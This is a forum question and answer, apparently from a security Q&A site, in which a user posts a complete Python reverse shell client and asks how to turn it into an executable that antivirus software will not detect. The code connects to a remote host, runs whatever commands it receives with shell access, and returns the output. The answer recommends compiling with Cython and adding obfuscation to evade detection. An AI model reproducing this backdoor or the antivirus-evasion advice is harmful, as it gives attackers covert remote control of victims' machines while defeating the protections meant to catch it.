When converting the reverse shell client.py python file to exe with pyinstaller it becomes detectable as a trojan on virustotal.com with most antivirus.

Here is my client file:

import os, socket, subprocess

s = socket.socket()
host = '192.168.1.81'
port = 9999
s.connect((host,port))

while True:
    data = s.recv(1024)
    if data[:2].decode('utf-8') == 'cd':
        os.chdir(data[3:].decode('utf-8'))
    if len(data) > 0:
        cmd = subprocess.Popen(data[:].decode('utf-8'), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output_byte = cmd.stdout.read() + cmd.stderr.read()
        output_str = str(output_byte,'utf-8')
        s.send(str.encode(output_str + str(os.getcwd()) +'> '))
    else:
        break

s.close()

How do I convert the file into an exe so that it stays undetected, like when it is in its Python file format (.py)?

  • Maybe the plain Python format isn't detected because the AV engines do not know how to execute it or read the source, but the pyinstaller binary can be statically and dynamically examined through normal means. – multithr3at3d Oct 12 '20 at 04:32

1 Answer

Many Python “exe” tools just package the script with a runtime. You may want to consider something like Cython that produces a C version that can be compiled directly to object code. I doubt your vanilla version will escape detection and may require further obfuscation.

– Marinus